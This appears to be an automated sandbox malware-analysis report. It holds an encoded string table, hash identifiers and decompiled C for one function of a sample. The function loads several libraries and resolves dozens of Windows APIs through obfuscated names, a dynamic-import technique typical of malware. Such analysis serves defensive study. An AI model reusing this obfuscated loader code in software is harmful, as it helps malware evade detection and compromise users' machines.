oNtGfCHDGY7E+gqg==$HLoNtGrLCza7$HLoPtX3OCSCK6nC8mJhX2YOB17U=$HYYqlBOHQTY=$Hb8MskjLIje74A==$Hb8MskjLKSCz6lG8uJhTwKKb/6g=$HbYXg1DUECCz1Uyyjp5hwLacz6M=$HbYXg1DUECCzyEaxmYVRxw==$HbYXg1DUECCzzE2jhA==$HbYXgFvIBwS64VGgmJ8=$HbYXgFvIByCt9mugipw=$HbYXgFvOEiSq4HO3hIpb2LK737PEfJpiWqpa/U0Q$HbYXhEDEDwax8E2x$HbYXhEDKAR+x60aMhYpdxrqJzrnfew==$HbYXhVrCFgG740Kwh5h+1bmP85Q=$HbYXhVrCFgG740Kwh5h+27SJ1rX+dJhp$HbYXhVrCFgu/6EaE$HbYXhkzVFyyx62a9vA==$HbYXk0bKFDCq4FGLioFX9Q==$HbYXk1zVFiCw8WesmYlRwLiaw5E=$HbYXk1zVFiCw8Wuyu55d0r6E35E=$HbYXk1zVFiCw8XO3hI9Xx6Q=$HbYXk1zVFiCw8XO3hI9Xx6Sh3g==$HbYXlEzRDSa7xkK1mA==$HbYXlEzUDzGx9XSshYhdww==$HbYXlGDlDTGt$HbYXlGo=$HbYXlUfRDTex606ghZhk1aWB27LccLQ=$HbYXlkDLAQyw40y3ho1G3biG+Kn4dJtoeK4=$HbYXlkDLARa3/0Y=$HbYXlkDLARa3/0aAkw==$HbYXm0zeBiq/90eJipVdwaOk06PE$HbYXnEbEBSm7zE2jhK0=$HbYXnEbEBSmK7E6g$HbYXnUbDESm7w0qpjqJT2bKtwpE=$HbcKoEXSFxa28FehhJtc$HbcKoEXSFxaq5FGxnpw=$HbcKoG3OFzWx9kaMho1V0Q==$HbcKoG7CEAyz5ESgroJR27ONyKM=$HbcKoG7CEAyz5ESgroJR27ONyKPjfI9p$HbcKoGrVASSq4GGsn4FTxJGa1b34V7xYWYpn$HbcKoHrGEiCX6EKijrhd56Oa37Hd$HbcKoHrGEiCX6EKijrhd8r6E3w==$HbwMt0XCRAa290yojg==$HpowgGXmPQ==$HqYTvEDEBTG7zUKrj4BX$HrYPtV3CIiyy4GI=$HrYPtV3CKye04ECx$HroQoEXGHQu/6EY=$HroQoEXGHRO791CshII=$HroQoEXGHX/+oFA=$HrwOsUDJRAu/6Eb/y8lB$IuVX$IutV$KA==$KaIPuV3CV2u66U8=$KaIPuV3CVxq47E2kh4VI0Q==$KaIPuV3CVxq96Uy2jg==$KaIPuV3CVxq96k+whoJt1q6c36M=$KaIPuV3CVxq96k+whoJt1ruH2A==$KaIPuV3CVxq96k+whoJtwLKQzg==$KaIPuV3CVxqt8Ua1$KaIPuV3CVxqu90a1ip5X66Ha$KaIPuV3CVxqx9Uar$KaoQpEzKSjGm8Q==$KbYGtAfUASax$KbsGvEWUVmu66U8=$KbsPp0jXDWu66U8=$KqACoECJZCmy$KrIQo17IFiGtq1e9nw==$KrIQo1nPFiSt4A2vmINc$L6AGohqVSiGy6Q==$L6AGokfGCSCY7Eapjw==$LLIWvF3ECCzw4U+p$LQ==$LaATokDJECOf$LboNtEbQSTaq5FegxYZB27k=$LboNuUfCEGu66U8=$M70FvwfUASax$MbYRvkzLV3fw4U+p$MbYao13IFiA=$N6YPpEDDCyK7q1Skh4BXwA==$Nb8G4xuJZCmy$NqAXokrGEAQ=$NrwEuUfUSi+t6k0=$O/g=$O6YXv0/OCCmC2Qa2tMlBmqOQzg==$O7cVsVnOV3fw4U+p$OLARqVnTSiGy6Q==$OaEaoF2UVmu66U8=$Ob4H/kzfAQ==$ObA/jAzUO2Ctq1e9nw==$ObwMu0DCF2ut9E+sn4k=$ObwMu0DCFxmCoFCazp8cwK+c$P6sMtFzUSiax60XrgZ9d2g==$P71jolDXECC60FCgmYJT2bI=$P71jolDXECC61UK2mJtdxrM=$PLoPtQ==$PLwRvUHOFzGx91rrmJ1e3aON$PLwRvXrSBii38XaXpw==$PaYKtA==$PbcK4xuJZCmy$PbcKoEXSF2u66U8=$PrYFsVzLEBqp5E+pjpg=$WrwNtROHQTY=$YIkMvkyJLSG761esjYVXxg==$a5EmlhnmUXKcwBL026p2gOHf+w==$cA==$cKQCvAOJZCSq$dA==$dLYbtQ==$dP0/jFnVCyO36Ua2xYVc3Q==$dbBDpEjUDy636U/lxJxb0PfN3vCWNZB+dbhSuBsiomacwW5lQ1L7ojV4/Yi6YDUz+hgt/VVn$f6A/jAM=$f6A/jAM=$f6A/jAzU$f6A/jGTIHiyy6UKZt6pbxrKO1ajsSYV+e61e9FsirCnS+g==$f6A=$f6BGtA==$f6BM4QfNFCI=$f6BM4gfNFCI=$f6BM4wfNFCI=$f6BM5AfNFCI=$f6BM5QfNFCI=$f6BM5gfNFCI=$f6BM5wfNFCI=$f6BMvUjOCmuu7VM=$f6Bq9Vo=$f6Bq9VquQTbXoFDMzp87kaThn6M=$f7c89U34QSGBoEeazohtkbM=$f7cb9U0=$f7dDnWs=$f7dM9U2IQSH+oEf/zogIkbM=$pplonline.org/Cgi/
API String ID: 1357844191-3892194903
Opcode ID: a3c22c575473bbeaac6691f30a64601ff18c4099c061499295f1c84ebdad0fd1
Instruction ID: 2548df94b326892427a6b6858e13a850900da9d925a4ee82bf65df64ed555e2b
Opcode Fuzzy Hash: a3c22c575473bbeaac6691f30a64601ff18c4099c061499295f1c84ebdad0fd1
Instruction Fuzzy Hash: EAD257F6D423407FAE04ABA9BD43A2D39F4A923704B1440B9ED0946376FE716554CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00B89700, Relevance: 210.7, APIs: 118, Strings: 2, Instructions: 730
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00B89700(void* __ecx) {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				struct HINSTANCE__* _v24;
				struct HINSTANCE__* _v28;
				struct HINSTANCE__* _v32;
				struct HINSTANCE__* _v36;
				struct HINSTANCE__* _v40;
				struct HINSTANCE__* _v44;
				struct HINSTANCE__* _v48;
				struct HINSTANCE__* _v52;
				CHAR* _t135;
				struct HINSTANCE__* _t136;
				struct HINSTANCE__* _t137;
				struct HINSTANCE__* _t138;
				CHAR* _t139;
				struct HINSTANCE__* _t140;
				struct HINSTANCE__* _t141;
				struct HINSTANCE__* _t142;
				CHAR* _t143;
				struct HINSTANCE__* _t144;
				struct HINSTANCE__* _t145;
				struct HINSTANCE__* _t146;
				CHAR* _t147;
				_Unknown_base(*)()* _t149;
				CHAR* _t150;
				CHAR* _t155;
				CHAR* _t160;
				_Unknown_base(*)()* _t161;
				CHAR* _t165;
				CHAR* _t170;
				CHAR* _t175;
				CHAR* _t180;
				CHAR* _t185;
				CHAR* _t188;
				CHAR* _t193;
				CHAR* _t198;
				CHAR* _t201;
				CHAR* _t204;
				CHAR* _t210;
				CHAR* _t215;
				CHAR* _t220;
				CHAR* _t227;
				CHAR* _t232;
				intOrPtr _t233;
				CHAR* _t238;
				CHAR* _t243;
				CHAR* _t248;
				CHAR* _t253;
				CHAR* _t258;
				CHAR* _t263;
				CHAR* _t268;
				CHAR* _t273;
				CHAR* _t278;
				CHAR* _t283;
				CHAR* _t288;
				CHAR* _t293;
				CHAR* _t298;
				CHAR* _t303;
				CHAR* _t308;
				CHAR* _t313;
				CHAR* _t318;
				CHAR* _t322;
				CHAR* _t323;
				CHAR* _t324;
				CHAR* _t325;
				CHAR* _t327;
				CHAR* _t329;
				CHAR* _t331;
				CHAR* _t333;
				CHAR* _t335;
				CHAR* _t336;
				CHAR* _t338;
				CHAR* _t340;
				CHAR* _t342;
				CHAR* _t344;
				CHAR* _t347;
				CHAR* _t350;
				CHAR* _t352;
				CHAR* _t354;
				CHAR* _t356;
				CHAR* _t358;
				CHAR* _t359;
				CHAR* _t361;
				CHAR* _t364;
				CHAR* _t366;
				CHAR* _t368;
				CHAR* _t370;
				CHAR* _t372;
				CHAR* _t374;
				CHAR* _t376;
				CHAR* _t378;
				CHAR* _t380;
				CHAR* _t382;
				CHAR* _t384;
				CHAR* _t386;
				CHAR* _t388;
				CHAR* _t390;
				CHAR* _t392;
				CHAR* _t394;
				CHAR* _t396;
				CHAR* _t398;
				CHAR* _t399;
				CHAR* _t400;
				CHAR* _t401;
				CHAR* _t403;
				CHAR* _t405;
				CHAR* _t407;
				CHAR* _t409;
				CHAR* _t412;
				CHAR* _t414;
				CHAR* _t416;
				CHAR* _t418;
				CHAR* _t420;
				CHAR* _t422;
				CHAR* _t423;
				CHAR* _t425;
				CHAR* _t426;
				CHAR* _t428;
				CHAR* _t430;
				CHAR* _t432;
				CHAR* _t434;
				CHAR* _t436;
				intOrPtr _t438;
				CHAR* _t440;
				CHAR* _t442;
				CHAR* _t444;
				CHAR* _t446;
				CHAR* _t448;
				CHAR* _t450;
				CHAR* _t452;
				CHAR* _t454;
				CHAR* _t456;
				CHAR* _t458;
				CHAR* _t460;
				CHAR* _t462;
				CHAR* _t464;
				CHAR* _t466;
				CHAR* _t468;
				CHAR* _t470;

				_v44 = E00B896D0(__ecx);
				if(_v44 != 0) {
					_t233 =  *0xba2204; // 0x2d084f0
					 *0xba2898 = E00B895A0(_v44, _t233);
					_t438 =  *0xba2438; // 0x2d083a0
					 *0xba280c = E00B895A0(_v44, _t438);
					_t364 =  *0xba26e8; // 0x2d08370
					 *0xba2814 = GetProcAddress(_v44, _t364);
					_t238 =  *0xba2540; // 0x2d07660
					 *0xba28d4 = GetProcAddress(_v44, _t238);
					_t440 =  *0xba24b4; // 0x2d085c8
					 *0xba28bc = GetProcAddress(_v44, _t440);
					_t366 =  *0xba20e0; // 0x2d085e0
					 *0xba2908 = GetProcAddress(_v44, _t366);
					_t243 =  *0xba2554; // 0x2d085f8
					 *0xba2888 = GetProcAddress(_v44, _t243);
					_t442 =  *0xba2274; // 0x2d083b8
					 *0xba278c = GetProcAddress(_v44, _t442);
					_t368 =  *0xba25cc; // 0x2d083d0
					 *0xba27c0 = GetProcAddress(_v44, _t368);
					_t248 =  *0xba20dc; // 0x2d077e0
					 *0xba2910 = GetProcAddress(_v44, _t248);
					_t444 =  *0xba26c8; // 0x2d075a0
					 *0xba2878 = GetProcAddress(_v44, _t444);
					_t370 =  *0xba213c; // 0x2d08568
					 *0xba28c0 = GetProcAddress(_v44, _t370);
					_t253 =  *0xba2230; // 0x2d077c0
					 *0xba28e8 = GetProcAddress(_v44, _t253);
					_t446 =  *0xba2218; // 0x2d08628
					 *0xba2840 = GetProcAddress(_v44, _t446);
					_t372 =  *0xba26c0; // 0x2d07580
					 *0xba28f4 = GetProcAddress(_v44, _t372);
					_t258 =  *0xba22fc; // 0x2d078e0
					 *0xba2774 = GetProcAddress(_v44, _t258);
					_t448 =  *0xba2580; // 0x2d063f8
					 *0xba27d0 = GetProcAddress(_v44, _t448);
					_t374 =  *0xba23dc; // 0x2d07740
					 *0xba2848 = GetProcAddress(_v44, _t374);
					_t263 =  *0xba245c; // 0x2d08448
					 *0xba2894 = GetProcAddress(_v44, _t263);
					_t450 =  *0xba2270; // 0x2d08508
					 *0xba2798 = GetProcAddress(_v44, _t450);
					_t376 =  *0xba21e8; // 0x2d07880
					 *0xba2824 = GetProcAddress(_v44, _t376);
					_t268 =  *0xba23d4; // 0x2d07560
					 *0xba285c = GetProcAddress(_v44, _t268);
					_t452 =  *0xba238c; // 0x2d07800
					 *0xba2780 = GetProcAddress(_v44, _t452);
					_t378 =  *0xba24e4; // 0x2d07920
					 *0xba28d0 = GetProcAddress(_v44, _t378);
					_t273 =  *0xba2500; // 0x2d07760
					 *0xba27f8 = GetProcAddress(_v44, _t273);
					_t454 =  *0xba2340; // 0x2d08610
					 *0xba2914 = GetProcAddress(_v44, _t454);
					_t380 =  *0xba2628; // 0x2d075c0
					 *0xba2884 = GetProcAddress(_v44, _t380);
					_t278 =  *0xba257c; // 0x2d06470
					 *0xba2770 = GetProcAddress(_v44, _t278);
					_t456 =  *0xba237c; // 0x2d08490
					 *0xba286c = GetProcAddress(_v44, _t456);
					_t382 =  *0xba249c; // 0x2d084c0
					 *0xba27a4 = GetProcAddress(_v44, _t382);
					_t283 =  *0xba2314; // 0x2d083e8
					 *0xba288c = GetProcAddress(_v44, _t283);
					_t458 =  *0xba2648; // 0x2d08460
					 *0xba28dc = GetProcAddress(_v44, _t458);
					_t384 =  *0xba25d8; // 0x2d08520
					 *0xba2820 = GetProcAddress(_v44, _t384);
					_t288 =  *0xba255c; // 0x2d084d8
					 *0xba27d8 = GetProcAddress(_v44, _t288);
					_t460 =  *0xba24e0; // 0x2d08400
					 *0xba276c = GetProcAddress(_v44, _t460);
					_t386 =  *0xba267c; // 0x2d08580
					 *0xba28c4 = GetProcAddress(_v44, _t386);
					_t293 =  *0xba217c; // 0x2d08418
					 *0xba2854 = GetProcAddress(_v44, _t293);
					_t462 =  *0xba22b0; // 0x2d08430
					 *0xba28d8 = GetProcAddress(_v44, _t462);
					_t388 =  *0xba25c4; // 0x2d08538
					 *0xba28e4 = GetProcAddress(_v44, _t388);
					_t298 =  *0xba26d0; // 0x2d08598
					 *0xba2864 = GetProcAddress(_v44, _t298);
					_t464 =  *0xba21fc; // 0x2d08550
					 *0xba27c4 = GetProcAddress(_v44, _t464);
					_t390 =  *0xba25a4; // 0x2d07820
					 *0xba2790 = GetProcAddress(_v44, _t390);
					_t303 =  *0xba23f4; // 0x2d085b0
					 *0xba28a4 = GetProcAddress(_v44, _t303);
					_t466 =  *0xba23ec; // 0x2d086e8
					 *0xba2860 = GetProcAddress(_v44, _t466);
					_t392 =  *0xba22c8; // 0x2d07540
					 *0xba2850 = GetProcAddress(_v44, _t392);
					_t308 =  *0xba266c; // 0x2d08670
					 *0xba28e0 = GetProcAddress(_v44, _t308);
					_t468 =  *0xba20ac; // 0x2d075e0
					 *0xba28f8 = GetProcAddress(_v44, _t468);
					_t394 =  *0xba218c; // 0x2d07600
					 *0xba2794 = GetProcAddress(_v44, _t394);
					_t313 =  *0xba21b8; // 0x2d06420
					 *0xba2844 = GetProcAddress(_v44, _t313);
					_t470 =  *0xba2330; // 0x2d08700
					 *0xba28c8 = GetProcAddress(_v44, _t470);
					_t396 =  *0xba2124; // 0x2d08658
					 *0xba2904 = GetProcAddress(_v44, _t396);
					_t318 =  *0xba2428; // 0x2d08640
					 *0xba27bc = GetProcAddress(_v44, _t318);
					 *0xba28f0 = GetProcAddress(_v44, "HeapFree");
				}
				_t135 =  *0xba2318; // 0x2d080a8
				_t136 = LoadLibraryA(_t135); // executed
				_v40 = _t136;
				_t322 =  *0xba22dc; // 0x2d080c0
				_t137 = LoadLibraryA(_t322); // executed
				_v36 = _t137;
				_t398 =  *0xba21d8; // 0x2d080d8
				_t138 = LoadLibraryA(_t398); // executed
				_v32 = _t138;
				_t139 =  *0xba2234; // 0x2d08108
				_t140 = LoadLibraryA(_t139); // executed
				_v48 = _t140;
				_t323 =  *0xba2560; // 0x2d08090
				_t141 = LoadLibraryA(_t323); // executed
				_v12 = _t141;
				_t399 =  *0xba262c; // 0x2d08120
				_t142 = LoadLibraryA(_t399); // executed
				_v20 = _t142;
				_t143 =  *0xba25dc; // 0x2d08358
				_t144 = LoadLibraryA(_t143); // executed
				_v28 = _t144;
				_t324 =  *0xba221c; // 0x2d08478
				_t145 = LoadLibraryA(_t324); // executed
				_v24 = _t145;
				_t400 =  *0xba2364; // 0x2d084a8
				_t146 = LoadLibraryA(_t400); // executed
				_v8 = _t146;
				_t147 =  *0xba2160; // 0x2d08340
				_v16 = LoadLibraryA(_t147);
				_t325 =  *0xba2108; // 0x2d08388
				_t149 = LoadLibraryA(_t325);
				_v52 = _t149;
				if(_v40 != 0) {
					_t434 =  *0xba2150; // 0x2d06358
					 *0xba2804 = GetProcAddress(_v40, _t434);
					_t359 =  *0xba2668; // 0x2d076c0
					 *0xba28a0 = GetProcAddress(_v40, _t359);
					_t227 =  *0xba24a4; // 0x2d06560
					 *0xba27c8 = GetProcAddress(_v40, _t227);
					_t436 =  *0xba233c; // 0x2d07620
					 *0xba27b4 = GetProcAddress(_v40, _t436);
					_t361 =  *0xba24b0; // 0x2d065d8
					 *0xba27a0 = GetProcAddress(_v40, _t361);
					_t232 =  *0xba2110; // 0x2d086d0
					_t149 = GetProcAddress(_v40, _t232);
					 *0xba28cc = _t149;
				}
				if(_v36 != 0) {
					_t426 =  *0xba2424; // 0x2d07720
					 *0xba2838 = GetProcAddress(_v36, _t426);
					_t352 =  *0xba24fc; // 0x2d07640
					 *0xba2810 = GetProcAddress(_v36, _t352);
					_t210 =  *0xba26b4; // 0x2d07680
					 *0xba2828 = GetProcAddress(_v36, _t210);
					_t428 =  *0xba2454; // 0x2d08688
					 *0xba27d4 = GetProcAddress(_v36, _t428);
					_t354 =  *0xba226c; // 0x2d076a0
					 *0xba2900 = GetProcAddress(_v36, _t354);
					_t215 =  *0xba24c0; // 0x2d076e0
					 *0xba283c = GetProcAddress(_v36, _t215);
					_t430 =  *0xba23ac; // 0x2d086a0
					 *0xba27e4 = GetProcAddress(_v36, _t430);
					_t356 =  *0xba225c; // 0x2d07b80
					 *0xba2800 = GetProcAddress(_v36, _t356);
					_t220 =  *0xba24f0; // 0x2d07940
					 *0xba2830 = GetProcAddress(_v36, _t220);
					_t432 =  *0xba265c; // 0x2d07c20
					 *0xba2834 = GetProcAddress(_v36, _t432);
					_t358 =  *0xba2280; // 0x2d07ce0
					_t149 = GetProcAddress(_v36, _t358);
					 *0xba289c = _t149;
				}
				if(_v32 != 0) {
					_t204 =  *0xba232c; // 0x2d07c80
					 *0xba27e0 = GetProcAddress(_v32, _t204);
					_t425 =  *0xba2114; // 0x2d07a80
					_t149 = GetProcAddress(_v32, _t425);
					 *0xba27cc = _t149;
				}
				if(_v48 != 0) {
					_t350 =  *0xba2378; // 0x2d07b60
					_t149 = GetProcAddress(_v48, _t350);
					 *0xba27f0 = _t149;
				}
				if(_v20 != 0) {
					_t201 =  *0xba2470; // 0x2d07b40
					 *0xba27a8 = GetProcAddress(_v20, _t201);
					_t423 =  *0xba2308; // 0x2d086b8
					_t149 = GetProcAddress(_v20, _t423);
					 *0xba28ac = _t149;
				}
				if(_v24 != 0) {
					_t347 =  *0xba227c; // 0x2d07c40
					 *0xba2868 = GetProcAddress(_v24, _t347);
					_t198 =  *0xba26b0; // 0x2d08af0
					 *0xba27f4 = GetProcAddress(_v24, _t198);
					_t422 =  *0xba210c; // 0x2d07c60
					_t149 = GetProcAddress(_v24, _t422);
					 *0xba2870 = _t149;
				}
				if(_v28 != 0) {
					_t342 =  *0xba261c; // 0x2d08a60
					 *0xba27ac = GetProcAddress(_v28, _t342);
					_t188 =  *0xba24c8; // 0x2d079a0
					 *0xba2918 = GetProcAddress(_v28, _t188);
					_t418 =  *0xba21b4; // 0x2d08b08
					 *0xba2858 = GetProcAddress(_v28, _t418);
					_t344 =  *0xba2528; // 0x2d08a48
					 *0xba282c = GetProcAddress(_v28, _t344);
					_t193 =  *0xba2674; // 0x2d07ba0
					 *0xba290c = GetProcAddress(_v28, _t193);
					_t420 =  *0xba222c; // 0x2d08a90
					 *0xba27e8 = GetProcAddress(_v28, _t420);
					_t149 = GetProcAddress(_v28, "RegEnumValueA");
					 *0xba2874 = _t149;
				}
				if(_v12 != 0) {
					_t416 =  *0xba212c; // 0x2d08a78
					_t149 = GetProcAddress(_v12, _t416);
					 *0xba2818 = _t149;
				}
				if(_v8 != 0) {
					_t336 =  *0xba23a4; // 0x2d06268
					 *0xba27b0 = GetProcAddress(_v8, _t336);
					_t175 =  *0xba22a4; // 0x2d07be0
					 *0xba27ec = GetProcAddress(_v8, _t175);
					_t412 =  *0xba22f8; // 0x2d06290
					 *0xba2880 = GetProcAddress(_v8, _t412);
					_t338 =  *0xba2214; // 0x2d079c0
					 *0xba2788 = GetProcAddress(_v8, _t338);
					_t180 =  *0xba219c; // 0x2d08aa8
					 *0xba28b0 = GetProcAddress(_v8, _t180);
					_t414 =  *0xba2490; // 0x2d08ac0
					 *0xba2890 = GetProcAddress(_v8, _t414);
					_t340 =  *0xba26dc; // 0x2d07c00
					 *0xba284c = GetProcAddress(_v8, _t340);
					_t185 =  *0xba2360; // 0x2d07ca0
					_t149 = GetProcAddress(_v8, _t185);
					 *0xba27b8 = _t149;
				}
				if(_v16 != 0) {
					_t405 =  *0xba2468; // 0x2d08ad8
					 *0xba281c = GetProcAddress(_v16, _t405);
					_t331 =  *0xba21c8; // 0x2d08850
					 *0xba2808 = GetProcAddress(_v16, _t331);
					_t165 =  *0xba2278; // 0x2d07bc0
					 *0xba279c = GetProcAddress(_v16, _t165);
					_t407 =  *0xba26bc; // 0x2d07cc0
					 *0xba27fc = GetProcAddress(_v16, _t407);
					_t333 =  *0xba22c0; // 0x2d07328
					 *0xba277c = GetProcAddress(_v16, _t333);
					_t170 =  *0xba25a0; // 0x2d08a18
					 *0xba2784 = GetProcAddress(_v16, _t170);
					_t409 =  *0xba2264; // 0x2d089d0
					 *0xba27dc = GetProcAddress(_v16, _t409);
					_t335 =  *0xba2578; // 0x2d088c8
					_t149 = GetProcAddress(_v16, _t335);
					 *0xba28b8 = _t149;
				}
				if(_v52 != 0) {
					_t150 =  *0xba24ac; // 0x2d07980
					 *0xba28b4 = GetProcAddress(_v52, _t150);
					_t401 =  *0xba2304; // 0x2d087c0
					 *0xba2768 = GetProcAddress(_v52, _t401);
					_t327 =  *0xba23cc; // 0x2d08958
					 *0xba28a8 = GetProcAddress(_v52, _t327);
					_t155 =  *0xba229c; // 0x2d07a20
					 *0xba28fc = GetProcAddress(_v52, _t155);
					_t403 =  *0xba25c0; // 0x2d07438
					 *0xba28ec = GetProcAddress(_v52, _t403);
					_t329 =  *0xba2590; // 0x2d07960
					 *0xba2778 = GetProcAddress(_v52, _t329);
					_t160 =  *0xba2584; // 0x2d079e0
					_t161 = GetProcAddress(_v52, _t160);
					 *0xba287c = _t161;
					return _t161;
				}
				return _t149;
			}

0x00b8970b
0x00b89712
0x00b89718
0x00b8972a
0x00b8972f
0x00b89742
0x00b89747
0x00b89758
0x00b8975d
0x00b8976d
0x00b89772
0x00b89783
0x00b89788
0x00b89799
0x00b8979e
0x00b897ae
0x00b897b3
0x00b897c4
0x00b897c9
0x00b897da
0x00b897df
0x00b897ef
0x00b897f4
0x00b89805
0x00b8980a
0x00b8981b
0x00b89820
0x00b89830
0x00b89835
0x00b89846
0x00b8984b
0x00b8985c
0x00b89861
0x00b89871
0x00b89876
0x00b89887
0x00b8988c
0x00b8989d
0x00b898a2
0x00b898b2
0x00b898b7
0x00b898c8
0x00b898cd
0x00b898de
0x00b898e3
0x00b898f3
0x00b898f8
0x00b89909
0x00b8990e
0x00b8991f
0x00b89924
0x00b89934
0x00b89939
0x00b8994a
0x00b8994f
0x00b89960
0x00b89965
0x00b89975
0x00b8997a
0x00b8998b
0x00b89990
0x00b899a1
0x00b899a6
0x00b899b6
0x00b899bb
0x00b899cc
0x00b899d1
0x00b899e2
0x00b899e7
0x00b899f7
0x00b899fc
0x00b89a0d
0x00b89a12
0x00b89a23
0x00b89a28
0x00b89a38
0x00b89a3d
0x00b89a4e
0x00b89a53
0x00b89a64
0x00b89a69
0x00b89a79
0x00b89a7e
0x00b89a8f
0x00b89a94
0x00b89aa5
0x00b89aaa
0x00b89aba
0x00b89abf
0x00b89ad0
0x00b89ad5
0x00b89ae6
0x00b89aeb
0x00b89afb
0x00b89b00
0x00b89b11
0x00b89b16
0x00b89b27
0x00b89b2c
0x00b89b3c
0x00b89b41
0x00b89b52
0x00b89b57
0x00b89b68
0x00b89b6d
0x00b89b7d
0x00b89b91
0x00b89b91
0x00b89b96
0x00b89b9c
0x00b89ba2
0x00b89ba5
0x00b89bac
0x00b89bb2
0x00b89bb5
0x00b89bbc
0x00b89bc2
0x00b89bc5
0x00b89bcb
0x00b89bd1
0x00b89bd4
0x00b89bdb
0x00b89be1
0x00b89be4
0x00b89beb
0x00b89bf1
0x00b89bf4
0x00b89bfa
0x00b89c00
0x00b89c03
0x00b89c0a
0x00b89c10
0x00b89c13
0x00b89c1a
0x00b89c20
0x00b89c23
0x00b89c2f
0x00b89c32
0x00b89c39
0x00b89c3f
0x00b89c46
0x00b89c4c
0x00b89c5d
0x00b89c62
0x00b89c73
0x00b89c78
0x00b89c88
0x00b89c8d
0x00b89c9e
0x00b89ca3
0x00b89cb4
0x00b89cb9
0x00b89cc3
0x00b89cc9
0x00b89cc9
0x00b89cd2
0x00b89cd8
0x00b89ce9
0x00b89cee
0x00b89cff
0x00b89d04
0x00b89d14
0x00b89d19
0x00b89d2a
0x00b89d2f
0x00b89d40
0x00b89d45
0x00b89d55
0x00b89d5a
0x00b89d6b
0x00b89d70
0x00b89d81
0x00b89d86
0x00b89d96
0x00b89d9b
0x00b89dac
0x00b89db1
0x00b89dbc
0x00b89dc2
0x00b89dc2
0x00b89dcb
0x00b89dcd
0x00b89ddd
0x00b89de2
0x00b89ded
0x00b89df3
0x00b89df3
0x00b89dfc
0x00b89dfe
0x00b89e09
0x00b89e0f
0x00b89e0f
0x00b89e18
0x00b89e1a
0x00b89e2a
0x00b89e2f
0x00b89e3a
0x00b89e40
0x00b89e40
0x00b89e49
0x00b89e4b
0x00b89e5c
0x00b89e61
0x00b89e71
0x00b89e76
0x00b89e81
0x00b89e87
0x00b89e87
0x00b89e90
0x00b89e96
0x00b89ea7
0x00b89eac
0x00b89ebc
0x00b89ec1
0x00b89ed2
0x00b89ed7
0x00b89ee8
0x00b89eed
0x00b89efd
0x00b89f02
0x00b89f13
0x00b89f21
0x00b89f27
0x00b89f27
0x00b89f30
0x00b89f32
0x00b89f3d
0x00b89f43
0x00b89f43
0x00b89f4c
0x00b89f52
0x00b89f63
0x00b89f68
0x00b89f78
0x00b89f7d
0x00b89f8e
0x00b89f93
0x00b89fa4
0x00b89fa9
0x00b89fb9
0x00b89fbe
0x00b89fcf
0x00b89fd4
0x00b89fe5
0x00b89fea
0x00b89ff4
0x00b89ffa
0x00b89ffa
0x00b8a003
0x00b8a009
0x00b8a01a
0x00b8a01f
0x00b8a030
0x00b8a035
0x00b8a045
0x00b8a04a
0x00b8a05b
0x00b8a060
0x00b8a071
0x00b8a076
0x00b8a086
0x00b8a08b
0x00b8a09c
0x00b8a0a1
0x00b8a0ac
0x00b8a0b2
0x00b8a0b2
0x00b8a0bb
0x00b8a0c1
0x00b8a0d1
0x00b8a0d6
0x00b8a0e7
0x00b8a0ec
0x00b8a0fd
0x00b8a102
0x00b8a112
0x00b8a117
0x00b8a128
0x00b8a12d
0x00b8a13e
0x00b8a143
0x00b8a14d
0x00b8a153
0x00000000
0x00b8a153
0x00b8a15b

APIs

GetProcAddress.KERNEL32(00000000,02D08370), ref: 00B89752
GetProcAddress.KERNEL32(00000000,02D07660), ref: 00B89767
GetProcAddress.KERNEL32(00000000,02D085C8), ref: 00B8977D
GetProcAddress.KERNEL32(00000000,02D085E0), ref: 00B89793
GetProcAddress.KERNEL32(00000000,02D085F8), ref: 00B897A8
GetProcAddress.KERNEL32(00000000,02D083B8), ref: 00B897BE
GetProcAddress.KERNEL32(00000000,02D083D0), ref: 00B897D4
GetProcAddress.KERNEL32(00000000,02D077E0), ref: 00B897E9
GetProcAddress.KERNEL32(00000000,02D075A0), ref: 00B897FF
GetProcAddress.KERNEL32(00000000,02D08568), ref: 00B89815
GetProcAddress.KERNEL32(00000000,02D077C0), ref: 00B8982A
GetProcAddress.KERNEL32(00000000,02D08628), ref: 00B89840
GetProcAddress.KERNEL32(00000000,02D07580), ref: 00B89856
GetProcAddress.KERNEL32(00000000,02D078E0), ref: 00B8986B
GetProcAddress.KERNEL32(00000000,02D063F8), ref: 00B89881
GetProcAddress.KERNEL32(00000000,02D07740), ref: 00B89897
GetProcAddress.KERNEL32(00000000,02D08448), ref: 00B898AC
GetProcAddress.KERNEL32(00000000,02D08508), ref: 00B898C2
GetProcAddress.KERNEL32(00000000,02D07880), ref: 00B898D8
GetProcAddress.KERNEL32(00000000,02D07560), ref: 00B898ED
GetProcAddress.KERNEL32(00000000,02D07800), ref: 00B89903
GetProcAddress.KERNEL32(00000000,02D07920), ref: 00B89919
GetProcAddress.KERNEL32(00000000,02D07760), ref: 00B8992E
GetProcAddress.KERNEL32(00000000,02D08610), ref: 00B89944
GetProcAddress.KERNEL32(00000000,02D075C0), ref: 00B8995A
GetProcAddress.KERNEL32(00000000,02D06470), ref: 00B8996F
GetProcAddress.KERNEL32(00000000,02D08490), ref: 00B89985
GetProcAddress.KERNEL32(00000000,02D084C0), ref: 00B8999B
GetProcAddress.KERNEL32(00000000,02D083E8), ref: 00B899B0
GetProcAddress.KERNEL32(00000000,02D08460), ref: 00B899C6
GetProcAddress.KERNEL32(00000000,02D08520), ref: 00B899DC
GetProcAddress.KERNEL32(00000000,02D084D8), ref: 00B899F1
GetProcAddress.KERNEL32(00000000,02D08400), ref: 00B89A07
GetProcAddress.KERNEL32(00000000,02D08580), ref: 00B89A1D
GetProcAddress.KERNEL32(00000000,02D08418), ref: 00B89A32
GetProcAddress.KERNEL32(00000000,02D08430), ref: 00B89A48
GetProcAddress.KERNEL32(00000000,02D08538), ref: 00B89A5E
GetProcAddress.KERNEL32(00000000,02D08598), ref: 00B89A73
GetProcAddress.KERNEL32(00000000,02D08550), ref: 00B89A89
GetProcAddress.KERNEL32(00000000,02D07820), ref: 00B89A9F
GetProcAddress.KERNEL32(00000000,02D085B0), ref: 00B89AB4
GetProcAddress.KERNEL32(00000000,02D086E8), ref: 00B89ACA
GetProcAddress.KERNEL32(00000000,02D07540), ref: 00B89AE0
GetProcAddress.KERNEL32(00000000,02D08670), ref: 00B89AF5
